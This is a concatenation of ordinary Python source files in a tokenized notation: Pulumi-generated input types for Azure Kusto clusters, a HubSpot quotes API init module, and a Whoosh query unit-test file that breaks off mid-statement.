# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** <import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<line_sep>__all__=['AttachedDatabaseConfigurationSharingArgs' 'ClusterIdentityArgs' 'ClusterOptimizedAutoScaleArgs' 'ClusterSkuArgs' 'ClusterVirtualNetworkConfigurationArgs' ]<line_sep>@pulumi.input_type<class_stmt>AttachedDatabaseConfigurationSharingArgs<block_start><def_stmt>__init__ __self__ * external_tables_to_excludes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> external_tables_to_includes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> materialized_views_to_excludes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> materialized_views_to_includes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> tables_to_excludes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> tables_to_includes:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none><block_start>""" :param pulumi.Input[Sequence[pulumi.Input[str]]] external_tables_to_excludes: List of external tables exclude from the follower database. :param pulumi.Input[Sequence[pulumi.Input[str]]] external_tables_to_includes: List of external tables to include in the follower database. :param pulumi.Input[Sequence[pulumi.Input[str]]] materialized_views_to_excludes: List of materialized views exclude from the follower database. :param pulumi.Input[Sequence[pulumi.Input[str]]] materialized_views_to_includes: List of materialized views to include in the follower database. :param pulumi.Input[Sequence[pulumi.Input[str]]] tables_to_excludes: List of tables to exclude from the follower database. :param pulumi.Input[Sequence[pulumi.Input[str]]] tables_to_includes: List of tables to include in the follower database. """<if_stmt>external_tables_to_excludes<is><not><none><block_start>pulumi.set(__self__ "external_tables_to_excludes" external_tables_to_excludes)<block_end><if_stmt>external_tables_to_includes<is><not><none><block_start>pulumi.set(__self__ "external_tables_to_includes" external_tables_to_includes)<block_end><if_stmt>materialized_views_to_excludes<is><not><none><block_start>pulumi.set(__self__ "materialized_views_to_excludes" materialized_views_to_excludes)<block_end><if_stmt>materialized_views_to_includes<is><not><none><block_start>pulumi.set(__self__ "materialized_views_to_includes" materialized_views_to_includes)<block_end><if_stmt>tables_to_excludes<is><not><none><block_start>pulumi.set(__self__ "tables_to_excludes" tables_to_excludes)<block_end><if_stmt>tables_to_includes<is><not><none><block_start>pulumi.set(__self__ "tables_to_includes" tables_to_includes)<block_end><block_end>@[email protected](name="externalTablesToExcludes")<def_stmt>external_tables_to_excludes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of external tables exclude from the follower database. """<line_sep><return>pulumi.get(self "external_tables_to_excludes")<block_end>@external_tables_to_excludes.setter<def_stmt>external_tables_to_excludes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "external_tables_to_excludes" value)<block_end>@[email protected](name="externalTablesToIncludes")<def_stmt>external_tables_to_includes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of external tables to include in the follower database. """<line_sep><return>pulumi.get(self "external_tables_to_includes")<block_end>@external_tables_to_includes.setter<def_stmt>external_tables_to_includes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "external_tables_to_includes" value)<block_end>@[email protected](name="materializedViewsToExcludes")<def_stmt>materialized_views_to_excludes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of materialized views exclude from the follower database. """<line_sep><return>pulumi.get(self "materialized_views_to_excludes")<block_end>@materialized_views_to_excludes.setter<def_stmt>materialized_views_to_excludes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "materialized_views_to_excludes" value)<block_end>@[email protected](name="materializedViewsToIncludes")<def_stmt>materialized_views_to_includes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of materialized views to include in the follower database. """<line_sep><return>pulumi.get(self "materialized_views_to_includes")<block_end>@materialized_views_to_includes.setter<def_stmt>materialized_views_to_includes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "materialized_views_to_includes" value)<block_end>@[email protected](name="tablesToExcludes")<def_stmt>tables_to_excludes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of tables to exclude from the follower database. """<line_sep><return>pulumi.get(self "tables_to_excludes")<block_end>@tables_to_excludes.setter<def_stmt>tables_to_excludes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "tables_to_excludes" value)<block_end>@[email protected](name="tablesToIncludes")<def_stmt>tables_to_includes self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" List of tables to include in the follower database. """<line_sep><return>pulumi.get(self "tables_to_includes")<block_end>@tables_to_includes.setter<def_stmt>tables_to_includes self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "tables_to_includes" value)<block_end><block_end>@pulumi.input_type<class_stmt>ClusterIdentityArgs<block_start><def_stmt>__init__ __self__ * type:pulumi.Input[str] identity_ids:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> principal_id:Optional[pulumi.Input[str]]=<none> tenant_id:Optional[pulumi.Input[str]]=<none><block_start>""" :param pulumi.Input[str] type: Specifies the type of Managed Service Identity that is configured on this Kusto Cluster. Possible values are: `SystemAssigned`, `UserAssigned` and `SystemAssigned, UserAssigned`. :param pulumi.Input[Sequence[pulumi.Input[str]]] identity_ids: A list of IDs for User Assigned Managed Identity resources to be assigned. :param pulumi.Input[str] principal_id: The Principal ID associated with this System Assigned Managed Service Identity. :param pulumi.Input[str] tenant_id: The Tenant ID associated with this System Assigned Managed Service Identity. """<line_sep>pulumi.set(__self__ "type" type)<if_stmt>identity_ids<is><not><none><block_start>pulumi.set(__self__ "identity_ids" identity_ids)<block_end><if_stmt>principal_id<is><not><none><block_start>pulumi.set(__self__ "principal_id" principal_id)<block_end><if_stmt>tenant_id<is><not><none><block_start>pulumi.set(__self__ "tenant_id" tenant_id)<block_end><block_end>@[email protected]<def_stmt>type self<arrow>pulumi.Input[str]<block_start>""" Specifies the type of Managed Service Identity that is configured on this Kusto Cluster. Possible values are: `SystemAssigned`, `UserAssigned` and `SystemAssigned, UserAssigned`. """<line_sep><return>pulumi.get(self "type")<block_end>@type.setter<def_stmt>type self value:pulumi.Input[str]<block_start>pulumi.set(self "type" value)<block_end>@[email protected](name="identityIds")<def_stmt>identity_ids self<arrow>Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>""" A list of IDs for User Assigned Managed Identity resources to be assigned. """<line_sep><return>pulumi.get(self "identity_ids")<block_end>@identity_ids.setter<def_stmt>identity_ids self value:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]<block_start>pulumi.set(self "identity_ids" value)<block_end>@[email protected](name="principalId")<def_stmt>principal_id self<arrow>Optional[pulumi.Input[str]]<block_start>""" The Principal ID associated with this System Assigned Managed Service Identity. """<line_sep><return>pulumi.get(self "principal_id")<block_end>@principal_id.setter<def_stmt>principal_id self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "principal_id" value)<block_end>@[email protected](name="tenantId")<def_stmt>tenant_id self<arrow>Optional[pulumi.Input[str]]<block_start>""" The Tenant ID associated with this System Assigned Managed Service Identity. """<line_sep><return>pulumi.get(self "tenant_id")<block_end>@tenant_id.setter<def_stmt>tenant_id self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "tenant_id" value)<block_end><block_end>@pulumi.input_type<class_stmt>ClusterOptimizedAutoScaleArgs<block_start><def_stmt>__init__ __self__ * maximum_instances:pulumi.Input[int] minimum_instances:pulumi.Input[int]<block_start>""" :param pulumi.Input[int] maximum_instances: The maximum number of allowed instances. Must between `0` and `1000`. :param pulumi.Input[int] minimum_instances: The minimum number of allowed instances. Must between `0` and `1000`. """<line_sep>pulumi.set(__self__ "maximum_instances" maximum_instances)<line_sep>pulumi.set(__self__ "minimum_instances" minimum_instances)<block_end>@[email protected](name="maximumInstances")<def_stmt>maximum_instances self<arrow>pulumi.Input[int]<block_start>""" The maximum number of allowed instances. Must between `0` and `1000`. """<line_sep><return>pulumi.get(self "maximum_instances")<block_end>@maximum_instances.setter<def_stmt>maximum_instances self value:pulumi.Input[int]<block_start>pulumi.set(self "maximum_instances" value)<block_end>@[email protected](name="minimumInstances")<def_stmt>minimum_instances self<arrow>pulumi.Input[int]<block_start>""" The minimum number of allowed instances. Must between `0` and `1000`. """<line_sep><return>pulumi.get(self "minimum_instances")<block_end>@minimum_instances.setter<def_stmt>minimum_instances self value:pulumi.Input[int]<block_start>pulumi.set(self "minimum_instances" value)<block_end><block_end>@pulumi.input_type<class_stmt>ClusterSkuArgs<block_start><def_stmt>__init__ __self__ * name:pulumi.Input[str] capacity:Optional[pulumi.Input[int]]=<none><block_start>""" :param pulumi.Input[str] name: The name of the SKU. Valid values are: `Dev(No SLA)_Standard_D11_v2`, `Dev(No SLA)_Standard_E2a_v4`, `Standard_D11_v2`, `Standard_D12_v2`, `Standard_D13_v2`, `Standard_D14_v2`, `Standard_DS13_v2+1TB_PS`, `Standard_DS13_v2+2TB_PS`, `Standard_DS14_v2+3TB_PS`, `Standard_DS14_v2+4TB_PS`, `Standard_E16as_v4+3TB_PS`, `Standard_E16as_v4+4TB_PS`, `Standard_E16a_v4`, `Standard_E2a_v4`, `Standard_E4a_v4`, `Standard_E64i_v3`, `Standard_E8as_v4+1TB_PS`, `Standard_E8as_v4+2TB_PS`, `Standard_E8a_v4`, `Standard_L16s`, `Standard_L4s`, `Standard_L8s`, `Standard_L16s_v2` and `Standard_L8s_v2`. :param pulumi.Input[int] capacity: Specifies the node count for the cluster. Boundaries depend on the sku name. """<line_sep>pulumi.set(__self__ "name" name)<if_stmt>capacity<is><not><none><block_start>pulumi.set(__self__ "capacity" capacity)<block_end><block_end>@[email protected]<def_stmt>name self<arrow>pulumi.Input[str]<block_start>""" The name of the SKU. Valid values are: `Dev(No SLA)_Standard_D11_v2`, `Dev(No SLA)_Standard_E2a_v4`, `Standard_D11_v2`, `Standard_D12_v2`, `Standard_D13_v2`, `Standard_D14_v2`, `Standard_DS13_v2+1TB_PS`, `Standard_DS13_v2+2TB_PS`, `Standard_DS14_v2+3TB_PS`, `Standard_DS14_v2+4TB_PS`, `Standard_E16as_v4+3TB_PS`, `Standard_E16as_v4+4TB_PS`, `Standard_E16a_v4`, `Standard_E2a_v4`, `Standard_E4a_v4`, `Standard_E64i_v3`, `Standard_E8as_v4+1TB_PS`, `Standard_E8as_v4+2TB_PS`, `Standard_E8a_v4`, `Standard_L16s`, `Standard_L4s`, `Standard_L8s`, `Standard_L16s_v2` and `Standard_L8s_v2`. """<line_sep><return>pulumi.get(self "name")<block_end>@name.setter<def_stmt>name self value:pulumi.Input[str]<block_start>pulumi.set(self "name" value)<block_end>@[email protected]<def_stmt>capacity self<arrow>Optional[pulumi.Input[int]]<block_start>""" Specifies the node count for the cluster. Boundaries depend on the sku name. """<line_sep><return>pulumi.get(self "capacity")<block_end>@capacity.setter<def_stmt>capacity self value:Optional[pulumi.Input[int]]<block_start>pulumi.set(self "capacity" value)<block_end><block_end>@pulumi.input_type<class_stmt>ClusterVirtualNetworkConfigurationArgs<block_start><def_stmt>__init__ __self__ * data_management_public_ip_id:pulumi.Input[str] engine_public_ip_id:pulumi.Input[str] subnet_id:pulumi.Input[str]<block_start>""" :param pulumi.Input[str] data_management_public_ip_id: Data management's service public IP address resource id. :param pulumi.Input[str] engine_public_ip_id: Engine service's public IP address resource id. :param pulumi.Input[str] subnet_id: The subnet resource id. """<line_sep>pulumi.set(__self__ "data_management_public_ip_id" data_management_public_ip_id)<line_sep>pulumi.set(__self__ "engine_public_ip_id" engine_public_ip_id)<line_sep>pulumi.set(__self__ "subnet_id" subnet_id)<block_end>@[email protected](name="dataManagementPublicIpId")<def_stmt>data_management_public_ip_id self<arrow>pulumi.Input[str]<block_start>""" Data management's service public IP address resource id. """<line_sep><return>pulumi.get(self "data_management_public_ip_id")<block_end>@data_management_public_ip_id.setter<def_stmt>data_management_public_ip_id self value:pulumi.Input[str]<block_start>pulumi.set(self "data_management_public_ip_id" value)<block_end>@[email protected](name="enginePublicIpId")<def_stmt>engine_public_ip_id self<arrow>pulumi.Input[str]<block_start>""" Engine service's public IP address resource id. """<line_sep><return>pulumi.get(self "engine_public_ip_id")<block_end>@engine_public_ip_id.setter<def_stmt>engine_public_ip_id self value:pulumi.Input[str]<block_start>pulumi.set(self "engine_public_ip_id" value)<block_end>@[email protected](name="subnetId")<def_stmt>subnet_id self<arrow>pulumi.Input[str]<block_start>""" The subnet resource id. """<line_sep><return>pulumi.get(self "subnet_id")<block_end>@subnet_id.setter<def_stmt>subnet_id self value:pulumi.Input[str]<block_start>pulumi.set(self "subnet_id" value)<block_end><block_end>
<import_from_future_stmt> absolute_import<line_sep># flake8: noqa # import apis into api package <import_from_stmt>hubspot.crm.quotes.api.associations_api AssociationsApi<import_from_stmt>hubspot.crm.quotes.api.basic_api BasicApi<import_from_stmt>hubspot.crm.quotes.api.batch_api BatchApi<import_from_stmt>hubspot.crm.quotes.api.search_api SearchApi<line_sep>
<import_from_future_stmt> with_statement<import_stmt>copy<import_stmt>pytest<import_from_stmt>whoosh fields qparser query<import_from_stmt>whoosh.compat b u<import_from_stmt>whoosh.filedb.filestore RamStorage<import_from_stmt>whoosh.qparser QueryParser<import_from_stmt>whoosh.query And<import_from_stmt>whoosh.query AndMaybe<import_from_stmt>whoosh.query ConstantScoreQuery<import_from_stmt>whoosh.query DateRange<import_from_stmt>whoosh.query DisjunctionMax<import_from_stmt>whoosh.query Every<import_from_stmt>whoosh.query FuzzyTerm<import_from_stmt>whoosh.query Not<import_from_stmt>whoosh.query NullQuery<import_from_stmt>whoosh.query NumericRange<import_from_stmt>whoosh.query Or<import_from_stmt>whoosh.query Phrase<import_from_stmt>whoosh.query Prefix<import_from_stmt>whoosh.query Require<import_from_stmt>whoosh.query Term<import_from_stmt>whoosh.query TermRange<import_from_stmt>whoosh.query Variations<import_from_stmt>whoosh.query Wildcard<import_from_stmt>whoosh.query.spans SpanContains<import_from_stmt>whoosh.query.spans SpanFirst<import_from_stmt>whoosh.query.spans SpanNear<import_from_stmt>whoosh.query.spans SpanNot<import_from_stmt>whoosh.query.spans SpanOr<import_from_stmt>whoosh.util.testing TempIndex<def_stmt>test_all_terms <block_start>q=QueryParser("a" <none>).parse(u('hello b:there c:"my friend"'))<line_sep>ts=q.all_terms(phrases=<false>)<assert_stmt>sorted(ts)<eq>[("a" "hello") ("b" "there")]<line_sep>ts=q.all_terms(phrases=<true>)<assert_stmt>sorted(ts)<eq>[("a" "hello") ("b" "there") ("c" "friend") ("c" "my")]<block_end><def_stmt>test_existing_terms <block_start>s=fields.Schema(key=fields.ID value=fields.TEXT)<line_sep>ix=RamStorage().create_index(s)<line_sep>w=ix.writer()<line_sep>w.add_document(key=u("a") value=u("alfa bravo charlie delta echo"))<line_sep>w.add_document(key=u("b") value=u("foxtrot golf hotel india juliet"))<line_sep>w.commit()<line_sep>r=ix.reader()<line_sep>q=QueryParser("value" <none>).parse(u('alfa hotel tango "sierra bravo"'))<line_sep>ts=q.existing_terms(r phrases=<false>)<assert_stmt>sorted(ts)<eq>[("value" b("alfa")) ("value" b("hotel"))]<line_sep>ts=q.existing_terms(r)<assert_stmt>sorted(ts)<eq>[("value" b("alfa")) ("value" b("bravo")) ("value" b("hotel"))]<block_end><def_stmt>test_wildcard_existing_terms <block_start>s=fields.Schema(key=fields.ID value=fields.TEXT)<line_sep>ix=RamStorage().create_index(s)<line_sep>w=ix.writer()<line_sep>w.add_document(key=u("a") value=u("alfa bravo bear charlie delta"))<line_sep>w.add_document(key=u("a") value=u("boggle echo render rendering renders"))<line_sep>w.commit()<line_sep>r=ix.reader()<line_sep>qp=QueryParser("value" ix.schema)<def_stmt>words terms<block_start>z=[]<for_stmt>t terms<block_start><assert_stmt>t[0]<eq>"value"<line_sep>z.append(t[1])<block_end><return>b(" ").join(sorted(z))<block_end>q=qp.parse(u("b*"))<line_sep>ts=q.existing_terms(r)<assert_stmt>ts<eq>set()<line_sep>ts=q.existing_terms(r expand=<true>)<assert_stmt>words(ts)<eq>b("bear boggle bravo")<line_sep>q=qp.parse(u("[a TO f]"))<line_sep>ts=q.existing_terms(r)<assert_stmt>ts<eq>set()<line_sep>ts=q.existing_terms(r expand=<true>)<assert_stmt>words(ts)<eq>b("alfa bear boggle bravo charlie delta echo")<line_sep>q=query.Variations("value" "render")<line_sep>ts=q.existing_terms(r expand=<false>)<assert_stmt>ts<eq>set([("value" b("render"))])<line_sep>ts=q.existing_terms(r expand=<true>)<assert_stmt>words(ts)<eq>b("render rendering renders")<block_end><def_stmt>test_replace <block_start>q=And([Or([Term("a" "b") Term("b" "c")] boost=1.2) Variations("a" "b" boost=2.0)])<line_sep>q=q.replace("a" "b" "BB")<assert_stmt>q<eq>And([Or([Term("a" "BB") Term("b" "c")] boost=1.2) Variations("a" "BB" boost=2.0)])<block_end><def_stmt>test_apply <block_start><def_stmt>visit q<block_start><if_stmt>isinstance(q (Term Variations FuzzyTerm))<block_start>q.text=q.text.upper()<line_sep><return>q<block_end><return>q.apply(visit)<block_end>before=And([Not(Term("a" u("b"))) Variations("a" u("c")) Not(FuzzyTerm("a" u("d")))])<line_sep>after=visit(before)<assert_stmt>after<eq>And([Not(Term("a" u("B"))) Variations("a" u("C")) Not(FuzzyTerm("a" u("D")))])<def_stmt>term2var q<block_start><if_stmt>isinstance(q Term)<block_start><return>Variations(q.fieldname q.text)<block_end><else_stmt><block_start><return>q.apply(term2var)<block_end><block_end>q=And([Term("f" "alfa") Or([Term("f" "bravo") Not(Term("f" "charlie"))])])<line_sep>q=term2var(q)<assert_stmt>q<eq>And([Variations('f' 'alfa') Or([Variations('f' 'bravo') Not(Variations('f' 'charlie'))])])<block_end><def_stmt>test_accept <block_start><def_stmt>boost_phrases q<block_start><if_stmt>isinstance(q Phrase)<block_start>q.boost<augmul>2.0<block_end><return>q<block_end>before=And([Term("a" u("b")) Or([Term("c" u("d")) Phrase("a" [u("e") u("f")])]) Phrase("a" [u("g") u("h")] boost=0.25)])<line_sep>after=before.accept(boost_phrases)<assert_stmt>after<eq>And([Term("a" u("b")) Or([Term("c" u("d")) Phrase("a" [u("e") u("f")] boost=2.0)]) Phrase("a" [u("g") u("h")] boost=0.5)])<line_sep>before=Phrase("a" [u("b") u("c")] boost=2.5)<line_sep>after=before.accept(boost_phrases)<assert_stmt>after<eq>Phrase("a" [u("b") u("c")] boost=5.0)<block_end><def_stmt>test_simplify <block_start>s=fields.Schema(k=fields.ID v=fields.TEXT)<line_sep>ix=RamStorage().create_index(s)<line_sep>w=ix.writer()<line_sep>w.add_document(k=u("1") v=u("aardvark apple allan alfa bear bee"))<line_sep>w.add_document(k=u("2") v=u("brie glue geewhiz goop julia"))<line_sep>w.commit()<line_sep>r=ix.reader()<line_sep>q1=And([Prefix("v" "b" boost=2.0) Term("v" "juliet")])<line_sep>q2=And([Or([Term('v' 'bear' boost=2.0) Term('v' 'bee' boost=2.0) Term('v' 'brie' boost=2.0)]) Term('v' 'juliet')])<assert_stmt>q1.simplify(r)<eq>q2<block_end><def_stmt>test_merge_ranges <block_start>q=And([TermRange("f1" u("a") <none>) TermRange("f1" <none> u("z"))])<assert_stmt>q.normalize()<eq>TermRange("f1" u("a") u("z"))<line_sep>q=And([NumericRange("f1" <none> u("aaaaa")) NumericRange("f1" u("zzzzz") <none>)])<assert_stmt>q.normalize()<eq>q<line_sep>q=And([TermRange("f1" u("a") u("z")) TermRange("f1" "b" "x")])<assert_stmt>q.normalize()<eq>TermRange("f1" u("a") u("z"))<line_sep>q=And([TermRange("f1" u("a") u("m")) TermRange("f1" u("f") u("q"))])<assert_stmt>q.normalize()<eq>TermRange("f1" u("f") u("m"))<line_sep>q=Or([TermRange("f1" u("a") u("m")) TermRange("f1" u("f") u("q"))])<assert_stmt>q.normalize()<eq>TermRange("f1" u("a") u("q"))<line_sep>q=Or([TermRange("f1" u("m") <none>) TermRange("f1" <none> u("n"))])<assert_stmt>q.normalize()<eq>Every("f1")<line_sep>q=And([Every("f1") Term("f1" "a") Variations("f1" "b")])<assert_stmt>q.normalize()<eq>Every("f1")<line_sep>q=Or([Term("f1" u("q")) TermRange("f1" u("m") <none>) TermRange("f1" <none> u("n"))])<assert_stmt>q.normalize()<eq>Every("f1")<line_sep>q=And([Or([Term("f1" u("a")) Term("f1" u("b"))]) Every("f1")])<assert_stmt>q.normalize()<eq>Every("f1")<line_sep>q=And([Term("f1" u("a")) And([Or([Every("f1")])])])<assert_stmt>q.normalize()<eq>Every("f1")<block_end><def_stmt>test_normalize_compound <block_start><def_stmt>oq <block_start><return>Or([Term("a" u("a")) Term("a" u("b"))])<block_end><def_stmt>nq level<block_start><if_stmt>level<eq>0<block_start><return>oq()<block_end><else_stmt><block_start><return>Or([nq(level-1) nq(level-1) nq(level-1)])<block_end><block_end>q=nq(5)<line_sep>q=q.normalize()<assert_stmt>q<eq>Or([Term("a" u("a")) Term("a" u("b"))])<block_end><def_stmt>test_duplicates <block_start>q=And([Term("a" u("b")) Term("a" u("b"))])<assert_stmt>q.normalize()<eq>Term("a" u("b"))<line_sep>q=And([Prefix("a" u("b")) Prefix("a" u("b"))])<assert_stmt>q.normalize()<eq>Prefix("a" u("b"))<line_sep>q=And([Variations("a" u("b")) And([Variations("a" u("b")) Term("a" u("b"))])])<assert_stmt>q.normalize()<eq>And([Variations("a" u("b")) Term("a" u("b"))])<line_sep>q=And([Term("a" u("b")) Prefix("a" u("b")) Term("a" u("b") boost=1.1)])<assert_stmt>q.normalize()<eq>q<line_sep># Wildcard without * or ? normalizes to Term q=And([Wildcard("a" u("b")) And([Wildcard("a" u("b")) Term("a" u("b"))])])<assert_stmt>q.normalize()<eq>Term("a" u("b"))<block_end># TODO: FIX THIS <def_stmt>test_query_copy_hash <block_start><def_stmt>do q1 q2<block_start>q1a=copy.deepcopy(q1)<assert_stmt>q1<eq>q1a<assert_stmt>hash(q1)<eq>hash(q1a)<assert_stmt>q1<ne>q2<block_end>do(Term("a" u("b") boost=1.1) Term("a" u("b") boost=1.5))<line_sep>do(And([Term("a" u("b")) Term("c" u("d"))] boost=1.1) And([Term("a" u("b")) Term("c" u("d"))] boost=1.5))<line_sep>do(Or([Term("a" u("b") boost=1.1) Term("c" u("d"))]) Or([Term("a" u("b") boost=1.8) Term("c" u("d"))] boost=1.5))<line_sep>do(DisjunctionMax([Term("a" u("b") boost=1.8) Term("c" u("d"))]) DisjunctionMax([Term("a" u("b") boost=1.1) Term("c" u("d"))] boost=1.5))<line_sep>do(Not(Term("a" u("b") boost=1.1)) Not(Term("a" u("b") boost=1.5)))<line_sep>do(Prefix("a" u("b") boost=1.1) Prefix("a" u("b") boost=1.5))<line_sep>do(Wildcard("a" u("b*x?") boost=1.1) Wildcard("a" u("b*x?") boost=1.5))<line_sep>do(FuzzyTerm("a" u("b") constantscore=<true>) FuzzyTerm("a" u("b") constantscore=<false>))<line_sep>do(FuzzyTerm("a" u("b") boost=1.1) FuzzyTerm("a" u("b") boost=1.5))<line_sep>do(TermRange("a" u("b") u("c")) TermRange("a" u("b") u("d")))<line_sep>do(TermRange("a" <none> u("c")) TermRange("a" <none> <none>))<line_sep>do(TermRange("a" u("b") u("c") boost=1.1) TermRange("a" u("b") u("c") boost=1.5))<line_sep>do(TermRange("a" u("b") u("c") constantscore=<true>) TermRange("a" u("b") u("c") constantscore=<false>))<line_sep>do(NumericRange("a" 1 5) NumericRange("a" 1 6))<line_sep>do(NumericRange("a" <none> 5) NumericRange("a" <none> <none>))<line_sep>do(NumericRange("a" 3 6 boost=1.1) NumericRange("a" 3 6 boost=1.5))<line_sep>do(NumericRange("a" 3 6 constantscore=<true>) NumericRange("a" 3 6 constantscore=<false>))<line_sep># do(DateRange) do(Variations("a" u("render")) Variations("a" u("renders")))<line_sep>do(Variations("a" u("render") boost=1.1) Variations("a" u("renders") boost=1.5))<line_sep>do(Phrase("a" [u("b") u("c") u("d")]) Phrase("a" [u("b") u("c") u("e")]))<line_sep>do(Phrase("a" [u("b") u("c") u("d")] boost=1.1) Phrase("a" [u("b") u("c") u("d")] boost=1.5))<line_sep>do(Phrase("a" [u("b") u("c") u("d")] slop=1) Phrase("a" [u("b") u("c") u("d")] slop=2))<line_sep># do(Ordered) do(Every() Every("a"))<line_sep>do(Every("a") Every("b"))<line_sep>do(Every("a" boost=1.1) Every("a" boost=1.5))<line_sep>do(NullQuery Term("a" u("b")))<line_sep>do(ConstantScoreQuery(Term("a" u("b"))) ConstantScoreQuery(Term("a" u("c"))))<line_sep>do(ConstantScoreQuery(Term("a" u("b")) score=2.0) ConstantScoreQuery(Term("a" u("c")) score=2.1))<line_sep>do(Require(Term("a" u("b")) Term("c" u("d"))) Require(Term("a" u("b") boost=1.1) Term("c" u("d"))))<line_sep># do(Require) # do(AndMaybe) # do(AndNot) # do(Otherwise) do(SpanFirst(Term("a" u("b")) limit=1) SpanFirst(Term("a" u("b")) limit=2))<line_sep>do(SpanNear(Term("a" u("b")) Term("c" u("d"))) SpanNear(Term("a" u("b")) Term("c" u("e"))))<line_sep>do(SpanNear(Term("a" u("b")) Term("c" u("d")) slop=1) SpanNear(Term("a" u("b")) Term("c" u("d")) slop=2))<line_sep>do(SpanNear(Term("a" u("b")) Term("c" u("d")) mindist=1) SpanNear(Term("a" u("b")) Term("c" u("d")) mindist=2))<line_sep>do(SpanNear(Term("a" u("b")) Term("c" u("d")) ordered=<true>) SpanNear(Term("a" u("b")) Term("c" u("d")) ordered=<false>))<line_sep>do(SpanNot(Term("a" u("b")) Term("a" u("c"))) SpanNot(Term("a" u("b")) Term("a" u("d"))))<line_sep>do(SpanOr([Term("a" u("b")) Term("a" u("c")) Term("a" u("d"))]) SpanOr([Term("a" u("b")) Term("a" u("c")) Term("a" u("e"))]))<line_sep>do(SpanContains(Term("a" u("b")) Term("a" u("c"))) SpanContains(Term("a" u("b")) Term("a" u("d"))))<line_sep># do(SpanBefore) # do(SpanCondition) <block_end><def_stmt>test_requires <block_start>a=Term("f" u("a"))<line_sep>b=Term("f" u("b"))<assert_stmt>And([a b]).requires()<eq>set([a b])<assert_stmt>Or([a b]).requires()<eq>set()<assert_stmt>AndMaybe(a b).requires()<eq>set([a])<assert_stmt>a.requires()<eq>set([a])<block_end><def_stmt>test_highlight_daterange <block_start><import_from_stmt>datetime datetime<line_sep>schema=fields.Schema(id=fields.ID(unique=<true> stored=<true>) title=fields.TEXT(stored=<true>) content=fields.TEXT(stored=<true>) released=fields.DATETIME(stored=<true>))<line_sep>ix=RamStorage().create_index(schema)<line_sep>w=ix.writer()<line_sep>w.update_document(id=u('1') title=u('Life Aquatic') content=u('A nautic film crew sets out to kill a gigantic shark.') released=datetime(2004 12 25))<line_sep>w.update_document(id=u('2') title=u('Darjeeling Limited') content=u('Three brothers meet in India for a life changing train '+'journey.') released=datetime(2007 10 27))<line_sep>w.commit()<line_sep>s=ix.searcher()<line_sep>r=s.search(Term('content' u('train')) terms=<true>)<assert_stmt>len(r)<eq>1<assert_stmt>r[0]["id"]<eq>"2"<assert_stmt>(r[0].highlights("content")<eq>'for a life changing <b class="match term0">train</b> journey')<line_sep>r=s.search(DateRange('released' datetime(2007 1 1) <none>))<assert_stmt>len(r)<eq>1<assert_stmt>r[0].highlights("content")<eq>''<block_end><def_stmt>test_patterns <block_start>domain=u("aaron able acre adage aether after ago ahi aim ajax akimbo "<concat>"alembic all amiga amount ampere").split()<line_sep>schema=fields.Schema(word=fields.KEYWORD(stored=<true>))<line_sep>ix=RamStorage().create_index(schema)<with_stmt>ix.writer()<as>w<block_start><for_stmt>word domain<block_start>w.add_document(word=word)<block_end><block_end><with_stmt>ix.reader()<as>r<block_start><assert_stmt>list(r.field_terms("word"))<eq>domain<assert_stmt>list(r.expand_prefix("word" "al"))<eq>[b("alembic") b("all")]<line_sep>q=query.Prefix("word" "al")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:alembic OR word:all)"<line_sep>q=query.Wildcard("word" "a*[ae]")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:able OR word:acre OR word:adage OR word:amiga OR word:ampere)"<assert_stmt>q._find_prefix(q.text)<eq>"a"<line_sep>q=query.Regex("word" "am.*[ae]")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:amiga OR word:ampere)"<assert_stmt>q._find_prefix(q.text)<eq>"am"<line_sep>q=query.Regex("word" "able|ago")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:able OR word:ago)"<assert_stmt>q._find_prefix(q.text)<eq>""<line_sep># special case: ? may mean "zero occurences" q=query.Regex("word" "ah?i")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:ahi OR word:aim)"<assert_stmt>q._find_prefix(q.text)<eq>"a"<line_sep># special case: * may mean "zero occurences" q=query.Regex("word" "ah*i")<assert_stmt>q.simplify(r).__unicode__()<eq>"(word:ahi OR word:aim)"<assert_stmt>q._find_prefix(q.text)<eq>"a"<block_end><block_end><def_stmt>test_or_nots1 # Issue #285 <block_start>schema=fields.Schema(a=fields.KEYWORD(stored=<true>) b=fields.KEYWORD(stored=<true>))<line_sep>st=RamStorage()<line_sep>ix=st.create_index(schema)<with_stmt>ix.writer()<as>w<block_start>w.add_document(a=u("alfa") b=u("charlie"))<block_end><with_stmt>ix.searcher()<as>s<block_start>q=query.And([query.Term("a" 